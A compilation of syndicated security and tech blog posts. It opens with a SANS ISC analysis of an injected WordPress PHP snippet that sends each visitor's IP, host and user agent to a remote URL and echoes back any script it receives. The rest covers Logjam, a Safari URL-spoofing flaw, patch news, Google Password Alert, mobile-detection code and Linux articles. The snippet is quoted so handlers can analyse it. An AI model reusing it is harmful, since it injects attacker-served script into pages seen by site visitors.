$wp_mezd098610 = '...?ip=' . $_SERVER['REMOTE_ADDR'] . '&referer=' . urlencode($_SERVER['HTTP_HOST']) . '&ua=' . urlencode($wp_mezd8610);

# check if we have the curl extension installed

if (function_exists('curl_init') && function_exists('curl_exec')) { /* retrieve the URL via curl */ }

# if we don't have curl, try file_get_contents, which requires allow_url_fopen.

elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) { $wp_8610mezd = @file_get_contents($wp_mezd098610); }

# or try fopen as a last resort
elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $wp_8610mezd = @stream_get_contents(@fopen($wp_mezd098610, 'r')); }
}

# The data retrieved will be echoed back to the user if it starts with the string "scr".
if (substr($wp_8610mezd, 1, 3) === 'scr') { echo $wp_8610mezd; }

I haven’t been able to retrieve any content from the URL. Has anybody else seen this code, or is anyone able to retrieve content from it?

According to whois, the domain is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a British ISP. Any help as to the nature of this snippet will be appreciated.

Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Schneier on Security: The Logjam (and Another) Vulnerability against Diffie-Hellman Key Exchange

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Logjam is a new attack against the Diffie-Hellman key-exchange protocol used in TLS. Basically:

The Logjam attack allows a man-in-the-middle attacker to downgrade vulnerable TLS connections to 512-bit export-grade cryptography. This allows the attacker to read and modify any data passed over the connection. The attack is reminiscent of the FREAK attack, but is due to a flaw in the TLS protocol rather than an implementation vulnerability, and attacks a Diffie-Hellman key exchange rather than an RSA key exchange. The attack affects any server that supports DHE_EXPORT ciphers, and affects all modern web browsers. 8.4% of the Top 1 Million domains were initially vulnerable.

Here’s the academic paper.
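If you want to check whether a server you rely on still negotiates weak Diffie-Hellman parameters, a quick client-side probe is possible with OpenSSL 1.0.2 or later (example.com is a placeholder host; the EDH cipher alias restricts the handshake to ephemeral-DH suites):

```shell
# Ask the server for an ephemeral-DH handshake and print the key size it offers.
# A result like "Server Temp Key: DH, 512 bits" would indicate export-grade parameters.
openssl s_client -connect example.com:443 -cipher "EDH" < /dev/null 2>/dev/null \
  | grep "Server Temp Key"
```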

One of the problems with patching the vulnerability is that it breaks things:

On the plus side, the vulnerability has largely been patched thanks to consultation with tech companies like Google, and updates are available now or coming soon for Chrome, Firefox and other browsers. The bad news is that the fix rendered many sites unreachable, including the main website at the University of Michigan, which is home to many of the researchers that found the security hole.

This is a common problem with version downgrade attacks; patching them makes you incompatible with anyone who hasn’t patched. And it’s the vulnerability the media is focusing on.

Much more interesting is the other vulnerability that the researchers found:

Millions of HTTPS, SSH, and VPN servers all use the same prime numbers for Diffie-Hellman key exchange. Practitioners believed this was safe as long as new key exchange messages were generated for every connection. However, the first step in the number field sieve — the most efficient algorithm for breaking a Diffie-Hellman connection — is dependent only on this prime. After this first step, an attacker can quickly break individual connections.

The researchers believe the NSA has been using this attack:

We carried out this computation against the most common 512-bit prime used for TLS and demonstrate that the Logjam attack can be used to downgrade connections to 80% of TLS servers supporting DHE_EXPORT. We further estimate that an academic team can break a 768-bit prime and that a nation-state can break a 1024-bit prime. Breaking the single, most common 1024-bit prime used by web servers would allow passive eavesdropping on connections to 18% of the Top 1 Million HTTPS domains. A second prime would allow passive decryption of connections to 66% of VPN servers and 26% of SSH servers. A close reading of published NSA leaks shows that the agency’s attacks on VPNs are consistent with having achieved such a break.

Remember James Bamford’s 2012 comment about the NSA’s cryptanalytic capabilities:

According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US. The upshot, according to this official: “Everybody’s a target; everybody with communication is a target.”


The breakthrough was enormous, says the former official, and soon afterward the agency pulled the shade down tight on the project, even within the intelligence community and Congress. “Only the chairman and vice chairman and the two staff directors of each intelligence committee were told about it,” he says. The reason? “They were thinking that this computing breakthrough was going to give them the ability to crack current public encryption.”

And remember Director of National Intelligence James Clapper’s introduction to the 2013 “Black Budget“:

Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic.

It’s a reasonable guess that this is what both Bamford’s source and Clapper are talking about. It’s an attack that requires a lot of precomputation — just the sort of thing a national intelligence agency would go for.

But that requirement also speaks to its limitations. The NSA isn’t going to put this capability at collection points like Room 641A at AT&T’s San Francisco office: the precomputation table is too big, and the sensitivity of the capability is too high. More likely, an analyst identifies a target through some other means, and then looks for data by that target in databases like XKEYSCORE. Then he sends whatever ciphertext he finds to the Cryptanalysis and Exploitation Services (CES) group, which decrypts it if it can using this and other techniques.

Ross Anderson wrote about this earlier this month, almost certainly quoting Snowden:

As for crypto capabilities, a lot of stuff is decrypted automatically on ingest (e.g. using a “stolen cert”, presumably a private key obtained through hacking). Else the analyst sends the ciphertext to CES and they either decrypt it or say they can’t.

The analysts are instructed not to think about how this all works. This quote also applied to NSA employees:

Strict guidelines were laid down at the GCHQ complex in Cheltenham, Gloucestershire, on how to discuss projects relating to decryption. Analysts were instructed: “Do not ask about or speculate on sources or methods underpinning Bullrun.”

I remember the same instructions in documents I saw about the NSA’s CES.

Again, the NSA has put surveillance ahead of security. It never bothered to tell us that many of the “secure” encryption systems we were using were not secure. And we don’t know what other national intelligence agencies independently discovered and used this attack.

The good news is now that we know reusing prime numbers is a bad idea, we can stop doing it.

SANS Internet Storm Center, InfoCON: green: Address spoofing vulnerability in Safari Web Browser, (Mon, May 18th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A new vulnerability has surfaced in the Safari web browser that allows address spoofing: an attacker can show any URL in the address bar while loading a different web page. While this proof of concept is not perfect, it could easily be refined for use in phishing attacks.

Here is the proof of concept from an iPad Air 2 running Safari:

From same iPad using Google Chrome:

The code is very simple: the web page reloads every 10 milliseconds using the setInterval() function, just before the browser can fetch the real page, so the address bar keeps showing the spoofed URL.

We are interested if you notice any phishing attacks using this vulnerability. If you see one, please let us know using our contact form.

Manuel Humberto Santander Peláez
SANS Internet Storm Center – Handler
Twitter: @manuelsantander
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Linux How-Tos and Linux Tutorials: Elementary OS Freya: Is This The Next Big Linux Distro?

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

Freya default desktop

I’ve tried just about every flavor of Linux available. Not a desktop interface has gone by that hasn’t, in some way, touched down before me. So when I set out to start kicking the tires of Elementary OS Freya, I assumed it was going to be just another take on the same old desktop metaphors. A variation of GNOME, a tweak of Xfce, a dash of OSX or some form of Windows, and the slightest hint of Chrome OS. What I wound up seeing didn’t disappoint on that level—it was a mixed bag of those very things. However, that mixed bag turned out to be something kind of special … something every Linux user should take notice of.

Why? Because Elementary OS Freya gets a lot of things right, including some things that other distributions have failed to bring to light. True user-friendliness.

Elementary OS Freya takes all of the known elements of a good UI, blends them together, and doesn’t toss in anything extraneous that might throw the user for a loop. The end result is a desktop interface that anyone (and I do mean anyone) can use without hiccup.

Before I dive any further into this, I must say that Freya is still in beta (and has been for quite some time). That being said, the beta release of Freya is rock solid. You can download the beta here and install it alongside your current OS or as a virtual guest in VirtualBox.

With that said, let’s examine what it is about Elementary OS Freya that makes it, quite possibly, the most ideal Linux desktop distribution (and maybe what it could use to draw it nearer to perfection).


The interface

This is where Freya truly nails just about every possible aspect of the desktop interface. Upon installation (or loading up the live image), you are greeted with a minimalist interface that, at first glance, looks like a take on GNOME Shell with an added dock for good measure (Figure 1).

You only need scratch the surface to find out that Freya has taken hints from nearly every major interface and rolled them into a coherent whole that will please everyone. Consider this:

  • OSX dock

  • Chrome OS menu

  • GNOME Shell panel

  • Multiple workspaces

  • OSX consistency in design

  • Ubuntu system settings

  • Ubuntu Software Center.

 Do you see where that is going? With those pieces working as a cohesive unit, the Freya desktop is already light years ahead of a number of platforms. And they do work together very well.

The foundation

Elementary OS did right by choosing Ubuntu as its foundation. With this, they receive the Ubuntu Software Center, which happens to be one of the most user-friendly package managers within the Linux ecosystem. This also adds the Ubuntu System Settings tool, which is quite simple to use (Figure 2).

Figure 2: The Elementary OS Freya System Settings tool.

Where Elementary OS Freya departs from Ubuntu (besides Unity) is the default applications. This also happens to be one area where Freya stumbles a bit: the default web browser. I get the desire to use Midori over the likes of Chrome or Firefox, but in reality that choice limits the platform in a number of ways (think supported sites). For someone like me, who depends upon Google Drive, Midori simply does not work. When I try to access Google Drive, I receive the warning “You are using an unsupported browser.”

To get around this, I must install either Chrome or Firefox. Not a problem, of course. All I need to do is hop on over to the Software Center and install Firefox. If I want Chrome, I head over to the Chrome download location and download the installable .deb file. If you install either Chrome or Firefox, surprisingly enough, the design scheme holds true for both.

NOTE: If you want to install Chrome on the current Freya beta, I highly recommend against doing so. Every attempt to load the Chrome download page (through either Midori or Firefox) actually crashes the Freya desktop to the point where a hard restart is necessary. So install Firefox through the Software Center and then download Chrome with Firefox. I did, however, manage to download the .deb file for Chrome on one machine, transfer it (via USB), and then install Chrome on Elementary OS. Once this was done, the Chrome Download page loaded fine (from Chrome only) and Google Drive worked flawlessly.

Missing apps

Outside of a supported browser, the one area that Elementary OS needs a bit of attention is the application selection. Upon installation, you will find no sign of an office suite or graphics tool. In fact, the closest thing to a word processor is the Scratch text editor. There is no LibreOffice to be found (and with the state of Midori rendering Google Drive useless, this is an issue).

Yes, you can hop over to the Software Center and install LibreOffice, but we’re looking at a Linux desktop variant that offers one of the best-designed interfaces for new users. Why make those users jump through hoops to get what nearly every flavor of Linux installs by default? On top of that, when installing LibreOffice through the Software Center (on Elementary OS), you wind up with a very out-of-date iteration of the software, which completely shatters the aesthetics of the platform (Figure 3).

Figure 3: An out-of-date version of LibreOffice breaks the global theme.

Including LibreOffice (and an up-to-date version at that) would take next to nothing. The latest iteration of Ubuntu (15.04) includes LibreOffice 4.4. This release of the flagship open source office suite would be much better suited for Elementary OS Freya … on every level. I highly recommend downloading the main LibreOffice installer and installing with the following steps:

  1. Open a terminal window.

  2. Change into the Downloads folder (assuming you downloaded the file there) with the command cd Downloads.

  3. Unpack the file with the command tar xvzf LibreOffice_XXX.tar.gz (Where XXX is the release number).

  4. Change into the DEBS subfolder of the newly created directory.

  5. Issue the command sudo dpkg -i *deb

Once the installation is complete, you’ll need to run the new install from the command line (since the entries for LibreOffice in the Applications menu will still be the old 4.2 release). The command to run the new version of LibreOffice is libreoffice4.4. Once opened, you can lock the launcher to the dock by right-clicking the LibreOffice icon in the dock and selecting Keep in Dock.
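Put together, steps 1 through 5 look like this (the archive and directory names are illustrative; substitute the actual release you downloaded):

```shell
# Unpack the downloaded archive and install every .deb it contains.
cd ~/Downloads
tar xvzf LibreOffice_4.4.3_Linux_x86-64_deb.tar.gz   # step 3 (illustrative name)
cd LibreOffice_4.4.3*_Linux_x86-64_deb/DEBS          # step 4: the DEBS subfolder
sudo dpkg -i *.deb                                   # step 5: install all packages
```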

There is so much to love about Elementary OS Freya. Considering this platform is still in beta makes it all the more impressive. Even though there are areas that could use a bit of polish, what we are looking at could easily take over as the single most user-friendly and well designed Linux distribution to date.

Have you given Elementary OS Freya a try? If so, what was your impression? Will you be ready to hop from your current distribution to this new flavor, once it is out of beta? If not, what keeps you from jumping ship?  

Krebs on Security: Adobe, Microsoft Push Critical Security Fixes

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Microsoft today issued 13 patch bundles to fix roughly four dozen security vulnerabilities in Windows and associated software. Separately, Adobe pushed updates to fix a slew of critical flaws in its Flash Player and Adobe Air software, as well as patches to fix holes in Adobe Reader and Acrobat.

Three of the Microsoft patches earned the company’s most dire “critical” rating, meaning they fix flaws that can be exploited to break into vulnerable systems with little or no interaction on the part of the user. The critical patches plug at least 30 separate flaws. The majority of those are included in a cumulative update for Internet Explorer. Other critical fixes address problems with the Windows OS, .NET, Microsoft Office, and Silverlight, among other components.

According to security vendor Shavlik, the issues addressed in MS15-044 deserve special priority in patching, partly because the bulletin impacts so many different Microsoft programs, but also because the vulnerabilities it fixes can be exploited merely by viewing specially crafted content in a Web page or a document. More information on, and links to, today’s individual updates can be found here.

Adobe’s update for Flash Player and AIR fixes at least 18 security holes in the programs. Updates are available for Windows, OS X and Linux versions of the software. For Mac and Windows users, the latest, patched version is v. 

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to the latest version. To force the installation of an available update, click the triple bar icon to the right of the address bar, select “About Google Chrome”, click the apply update button and restart the browser.


The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g. Firefox or Opera).

If you run Adobe Reader, Acrobat or AIR, you’ll need to update those programs as well. Adobe said it is not aware of any active exploits or attacks against any of the vulnerabilities it patched with today’s releases.

Schneier on Security: Protecting Against Google Phishing in Chrome

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Google has a new Chrome extension called “Password Alert”:

To help keep your account safe, today we’re launching Password Alert, a free, open-source Chrome extension that protects your Google and Google Apps for Work Accounts. Once you’ve installed it, Password Alert will show you a warning if you type your Google password into a site that isn’t a Google sign-in page. This protects you from phishing attacks and also encourages you to use different passwords for different sites, a security best practice.

Here’s how it works for consumer accounts. Once you’ve installed and initialized Password Alert, Chrome will remember a “scrambled” version of your Google Account password. It only remembers this information for security purposes and doesn’t share it with anyone. If you type your password into a site that isn’t a Google sign-in page, Password Alert will show you a notice like the one below. This alert will tell you that you’re at risk of being phished so you can update your password and protect yourself.
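The mechanism can be sketched in a few lines of shell (a toy illustration only, not Password Alert’s actual code; the salt, the choice of sha256 and the password are made up for the example):

```shell
# At setup time, store only a salted hash of the password (assumption: sha256;
# Google only says a "scrambled" version is kept).
salt="per-install-random-salt"
stored=$(printf '%s%s' "$salt" "hunter2" | sha256sum | awk '{print $1}')

# Later, hash whatever the user types on a non-Google page and compare.
typed=$(printf '%s%s' "$salt" "hunter2" | sha256sum | awk '{print $1}')
if [ "$stored" = "$typed" ]; then
  echo "Password Alert: you typed your Google password on a non-Google page"
fi
```

Because only the salted hash is kept, the extension never needs to store the password itself.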

It’s a clever idea. Of course it’s not perfect, and doesn’t completely solve the problem. But it’s an easy security improvement, and one that should be generalized to non-Google sites. (Although it’s not uncommon for the security of many passwords to be tied to the security of the e-mail account.) It reminds me somewhat of cert pinning; in both cases, the browser uses independent information to verify what the network is telling it.

Slashdot thread.

Toool's Blackbag: Euro-Locks

This post was syndicated from: Toool's Blackbag and was written by: Walter. Original post: at Toool's Blackbag

April 24th, a delegation of Toool visited the Euro-Locks factory in Bastogne, Belgium.

Sales manager Jean-Louis Vincart welcomed us and walked us through the history of Euro-Locks, its factories and its products. After that, we visited the actual production facility. The Bastogne factory is huge, and almost all of their products are built here from start to finish. We spoke with the R&D people creating new molds, and saw molten zamak, steel presses, chrome baths, assembly lines and packaging: everything from the raw metal to the finished product. It’s interesting to see so many products (both in range and in the actual number of locks produced) being made here, with no stock of the finished product kept on site.

Thanks to Eric and Martin for making the visit possible.

The Hacker Factor Blog: Great Googly Moogly!

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

Google recently made another change to their pagerank algorithm. This time, they are ranking results based on the type of device querying it. What this means: a Google search from a desktop computer will return different results compared to the same search from a mobile device. If a web page is better formatted for a mobile device, then it will have a higher search result rank for searches made from mobile devices.

I understand Google’s desire to have web pages that look good on both desktop and mobile devices. However, shouldn’t the content, authoritativeness, and search topic be more important than whether the page looks pretty on a mobile device?

As a test, I searched Google for “is this picture fake”. The search results on my desktop computer were different from the results on my Android phone. In particular, the second desktop result was completely gone on the mobile device, the FotoForensics FAQ was pushed down, TinEye was moved up, and other analysis services were removed from the mobile results entirely.

In my non-algorithmic personal opinion, the desktop results were more authoritative and better matched the search query than the mobile results.

Google’s Preference

Google announced this change on February 26, giving developers less than two months’ notice.

While two months may be plenty of time for small developers to change their site layout, I suspect that most small developers never heard about this change. For a larger organization, two months is barely enough time to have a meeting about having a meeting about scheduling a meeting to discuss a site redesign for mobile devices.

In other words: Google barely gave anyone notice, and did not give most sites time to act. This is reminiscent of security researchers who report vulnerabilities to vendors and then set arbitrarily short deadlines before going public. Short deadlines are not about doing the right thing; they are about pushing an agenda.

Tools for the trade

On the plus side, Google provided a nice web tool for evaluating web sites. This allows site designers to see how their web pages look on a mobile device. (At least, how it will look according to Google.)

Google also provides a mobile guide that describes what Google thinks a good web page layout looks like. For example, you should use large fonts and only one column in the layout. Google also gives suggestions like using dynamic layout web pages (detect the screen and rearrange accordingly) and using separate servers (www.domain and m.domain): one for desktop users and one for mobile devices.

Google’s documentation emphasizes that this is really for smartphone users. They state that by “mobile devices”, they are only talking about smartphones, not tablets, feature phones, or other devices. (I always thought that a mobile device was anything you could use while being mobile…)

Little Time, Little Effort

One of my big irks about Google is that Google’s employees seem to forget that not every company is as big as Google or has as many resources as Google. Not everyone is Google. By giving developers very little time to make changes that better match Google’s preferred design, it just emphasizes how out of touch Google’s developers are with the rest of the world. The requirements decreed in their development guidelines also show an unrealistic view of the world. For example:

  • Google recommends using dynamic web pages for more flexibility. But dynamic pages also mean much more testing and require a larger testing environment. Testing is usually where someone notices that the site lacks usability.

    Google+ has a flexible interface — the number of columns varies based on the width of the browser window. But Google+ also has a horrible multi-column layout that cannot be disabled. And LinkedIn moved most of their billions of options into popups — now you cannot click on anything without it being covered by a popup window first.

    For my own sites, I do try to test with different browsers. Even if I think my site looks great on every mobile device I tested, that does not mean that it will look great on every mobile device. (I cannot test on everything.)

    Providing the same content to every device minimizes the development and testing efforts. It also simplifies the usability options.

  • Google suggests the option of maintaining two URLs or two separate site layouts — one for desktops and one for mobile devices. They overlook that this means twice the development effort, which translates into twice the development costs.
  • Maintaining two URLs also means double the amount of bot traffic indexing the site, double the load on the server, and double the network bandwidth. Right now, about 75% of the traffic to my site comes from bots indexing and mirroring (and attacking) my site. If I maintained two URLs to the same content with different formatting, I would be dividing the visitor load between the two sites (half go mobile and half go desktop), while doubling the bot traffic.
  • Google’s recommendations normalize the site layout. Everyone should use large text. Everyone should use one column for mobile displays, etc.

    Normalizing web site layouts goes against the purpose of HTML and basic web site design. Your web site should look the way that you want it to look. If you want small text, then you can use small text. If you want a wide layout, then you can use a wide layout. Every web site can look different. Just be aware that Google’s pagerank system now penalizes you for looking different and for expressing creativity.

  • Google’s online test for mobile devices does not take into account whether the device is held vertically or horizontally. My Android phone rotates the screen and makes the text larger when I hold it horizontally. According to Google, all mobile pages should be designed for a vertical screen.

Ironically, there has been a lot of effort by mobile web browser developers (not the web site, but the actual browser developers) to mitigate display issues in the browser. One tap zooms into the text and reflows it to fit the screen, another tap zooms out and reflows it again. And rotating the screen makes the browser display wider instead of taller. Google’s demand to normalize the layout really just means that Google has zero confidence in the mobile browser developers and a limited view on how users use mobile devices.

Moving targets

There’s one significant technical issue that is barely addressed by Google’s Mobile Developer Guide: how does a web site detect a mobile device?

According to Google, your code should look at the user-agent field for “Android” and “Mobile”. That may work well with newer Android smartphones, but it won’t help older devices or smartphones that don’t use those keywords. Also, there are plenty of non-smartphone devices that use these words. For example, Apple’s iPad tablet has a user-agent string that says “Mobile” in it.
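Google’s minimal keyword test can be sketched in a few lines of shell. This is only an illustration of the heuristic, not production code; the sample user-agent strings are made up for the example, and (as just noted) the check will misfire on tablets and miss non-Android phones:

```shell
# Heuristic sketch: a user-agent containing both "Android" and "Mobile"
# is *probably* an Android smartphone. Tablets (iPad, Kindle) will
# confuse this check, and non-Android phones will escape it entirely.
is_probably_smartphone() {
  case "$1" in
    *Android*Mobile*|*Mobile*Android*) return 0 ;;  # both keywords found
    *) return 1 ;;                                  # one or both missing
  esac
}

is_probably_smartphone "Mozilla/5.0 (Linux; Android 4.4.2; Mobile Safari/537.36)" \
  && echo "classified as mobile"
is_probably_smartphone "Mozilla/5.0 (Windows NT 6.1; Win64; x64)" \
  || echo "classified as desktop"
```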

In fact, there is no single HTTP header that says “Hi! I’m a mobile device! Give me mobile content!” There’s a standard header for specifying supported document formats. There’s a standard header for specifying preferred language. But there is no standard for identifying a mobile device.
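To make the gap concrete, here is roughly what a browser’s request headers look like (the values are illustrative). Formats and language each get a standard header; nothing declares “I am a mobile device”:

```
GET / HTTP/1.1
Host: example.com
Accept: text/html,application/xhtml+xml;q=0.9,*/*;q=0.8    <- supported document formats
Accept-Language: en-US,en;q=0.5                            <- preferred language
User-Agent: Mozilla/5.0 (...)                              <- free-form; no "mobile" flag
```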

There is a great write-up called “How to Detect Mobile Devices“. It lists a bunch of different methods and the trade-offs between each.

For example, you can try to use JavaScript to render the page. This is good for most smartphones, but many feature-phones lack JavaScript support. The question also becomes: what should you detect? Screen size may be a good option, but otherwise there is no standard. This approach can also be problematic for indexing bots since it requires rendering JavaScript to see the layout. (Running JavaScript in a bot becomes a halting problem since the bot cannot predict when the code will finish rendering the page.)

Alternately, you can try to use custom style sheets. There’s a style sheet extension “@media” for specifying a different layout for mobile devices. Unfortunately, many mobile devices don’t support this extension. (Oh the irony!)

Usually people try to detect the mobile device on the server side. Every web browser sends a user-agent string that describes the browser and basic capabilities. For example:

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.3) Gecko/20150308 Firefox/31.9 PaleMoon/25.3.0

User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4

User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-T530NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36

User-Agent: Opera/9.80 (Android; Opera Mini/7.6.40234/36.1701; U; en) Presto/2.12.423 Version/12.16

The first sample user-agent string identifies the Pale Moon web browser (PaleMoon 25.3.0) on a 64-bit Windows 7 system (Windows NT 6.1; Win64). It says that it is compatible with Firefox 31 (Firefox/31.9) and supports the Gecko toolkit extension (Gecko/20150308). This is likely a desktop system.

The second sample identifies Mobile Safari 8.0 on an iPhone running iOS 8.1.2. This is a mobile device because I know iPhones are mobile devices, not because it says “Mobile”.

The third sample identifies the Android browser 1.5 on a Samsung SM-T530NU device running Android 4.4 (KitKat) and configured for English from the United States. It doesn’t say what it is, but I can look it up and determine that the SM-T530NU is a tablet.

The fourth and final example identifies Opera Mini, which is Opera for mobile devices. Other than looking up the browser type, nothing in the user-agent string tells me it is a mobile device.

The typical solution is to have the web site check the user-agent string for known substrings. If it sees “Mobile” or “iPhone”, then we can assume it is some kind of mobile device, though not necessarily a smartphone. The web site Detect Mobile Browsers offers code snippets for detecting mobile devices. Google’s documentation says to look for ‘Android’ and ‘Mobile’. Here’s the PHP code that Detect Mobile Browsers suggests using:

if (preg_match('/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i',$useragent)||preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i',substr($useragent,0,4))) { /* then… */ }

This is more than just detecting ‘Android’ and ‘Mobile’. If the user-agent string says Android or Meego or Mobile or Avantgo or Blackberry or Blazer or KDDI or Opera (with mini or mobi or mobile)… then it is probably a mobile device.

Of course, there are two big problems with this code. First, it has so many conditions that it is likely to produce false positives (e.g., detecting a tablet or even a desktop as a mobile phone). In fact, we can see this problem in the code: the regular expression contains “kindle”, and the Amazon Kindle is a tablet, not a smartphone. (The Kindle user-agent string also includes the word ‘Android’ and may include the word ‘Mobile’.)

Second, this long chunk of code is a regular expression, a language describing a pattern to match. Regular expressions are relatively slow to evaluate, and more complicated expressions take more time. Unless you have unlimited resources (like Google) or low web volume, you probably do not want to run this code on every web page request.

If Google really wants to have every web site provide mobile-specific content, then perhaps they should push through a standard HTTP header for declaring a mobile device, tablet, and other types of devices. Right now, Google is forcing web sites to redesign for devices that they may not be able to detect.

(Of course, none of this handles the case where an anonymizer changes the user-agent setting, or where users change the user-agent value in their browser.)

Low Ranking Advice

Some of Google’s mobile site suggestions are good, but not limited to mobile devices. Enabling server compression and designing pages for fast loading benefit both desktop and mobile browsers.

I actually think that there may be a hidden motivation behind Google’s desire to force web site redesigns… The recommended layout — with large primary text, viewport window, and single column layout — is probably easier for Google to parse and index. In other words, Google wants every site to look the same so it will be easier for Google to index the content.

And then there is the entire anti-competitive edge. Google’s suggestion for detecting mobile devices (look for ‘Android’) excludes non-android devices like Apple’s iPhone. Looking for ‘Mobile’ misclassifies Apple’s iPad, potentially leading to a lesser user experience on Apple products. And Google wants you to make site changes so that your web pages work better with Googlebot. This effectively turns all web sites into Google-specific web sites.

Promoting aesthetics over content seems to go against the purpose of a search engine; users search for content, not styling. Normalizing content layout contradicts the purpose of having configurable layouts. Giving developers less than two months to make major changes seems out of touch with reality. And requiring design choices that favor the dominant company’s strict views seems very anti-competitive to me.

Many web sites depend on search engines like Google for income — either directly through ads or indirectly through visibility. This recent change at Google will dramatically impact many web sites — sites with solid content but, according to Google, less desirable layouts. Moreover, it forces companies to comply with Google’s requirements or lose future revenue.

Google has a long history of questionable behavior, including multiple lawsuits against Google for anti-competitive behavior and privacy violations. However, each of those cases is debatable. In contrast, I think this requirement for site-layout compliance is the first time that the “do no evil” company has explicitly gone evil in a non-debatable way.

Linux How-Tos and Linux Tutorials: How to Configure Your Dev Machine to Work From Anywhere (Part 3)

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jeff Cogswell. Original post: at Linux How-Tos and Linux Tutorials

In the previous articles, I talked about my mobile setup and how I’m able to continue working on the go. In this final installment, I’ll talk about how to install and configure the software I’m using. Most of what I’m talking about here is on the server side, because the Android and iPhone apps are pretty straightforward to configure.

Before we begin, however, I want to mention that the setup I’ve been describing really isn’t for production machines; it should be limited to development and test machines. Also, there are many different ways to work remotely, and this is only one possibility. In general, you really can’t beat a good command-line tool and SSH access. But in some cases that didn’t work for me. I needed more: a full Chrome JavaScript debugger, and better word processing than was available on my Android tablets.

Here, then, is how I configured the software. Note, however, that I’m not writing this as a complete tutorial, simply because that would take too much space. Instead, I’m providing overviews, and assuming you know the basics and can google to find the details. We’ll take this step by step.

Spin up your server

